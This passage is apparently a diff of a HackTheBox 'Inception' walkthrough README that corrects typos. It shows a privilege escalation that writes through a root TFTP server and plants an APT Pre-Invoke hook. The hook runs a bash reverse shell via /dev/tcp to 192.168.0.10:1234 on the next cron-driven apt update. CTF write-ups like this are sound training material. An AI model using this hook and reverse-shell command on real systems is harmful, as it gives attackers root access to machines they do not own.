0x90JMP/0x90JMP.github.io/htb/inception/readme.md

 Continuing the search of the /etc directory on FTP, we find the default configuration file for a tftp sever.

 ```
-cat /192.168.0.1/etcdefault/tftpd-hpa
+cat /192.168.0.1/etc/default/tftpd-hpa
 ```

 ![image](tftp-config.png)

-The server is running as root as root and is hosting the / filesystem.
+The server is running as root and is hosting the / filesystem.
 Tftp does not have any security or authentication, so let's try and write to the target at 192.168.0.1.
 We will try to write to /home and confirm the existence of the file by connecting to ftp.

 Create a file named test.txt, then connect to the target via tftp.
 Write the file to /home/, exit tftp and logging to ftp and confirm that test.txt was written to /home/

 ![image](tftp-confirm.png)

-## Privilege Escalation On COntainer Host
+## Privilege Escalation On Container Host

 We have write access to the / file system via the tftp misconfiguration, we also know that apt update is running as a cron job every 5 minutes.

-With the information about 'APT::Update::Pre-Invoke' and our write access, we can create a file inside /etc/apt/apt.conf.d/.
+With the information about 'APT::Update::Pre-Invoke' and our write access via tftp, we can create a file inside /etc/apt/apt.conf.d/.
 The contents of the file will execute our chosen command prior to apt update being executed.

 ### Putting it all together

-We will create a file named 'exploit' and enter the following configuration into it.
+We will create a file named 'exploit' and enter a configuration into it.

 ```
 vim exploit
 ```

-The configuration will execute a bash reverse shell to the container on port 1234.
-We use this port as we know it will be accessible.
+The configuration will execute a bash reverse shell to the container (192.168.0.10) on port 1234.
+We will use this port as we know it will be accessible.

 ```
 APT::Update::Pre-Invoke {"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.10/1234 0>&1'"}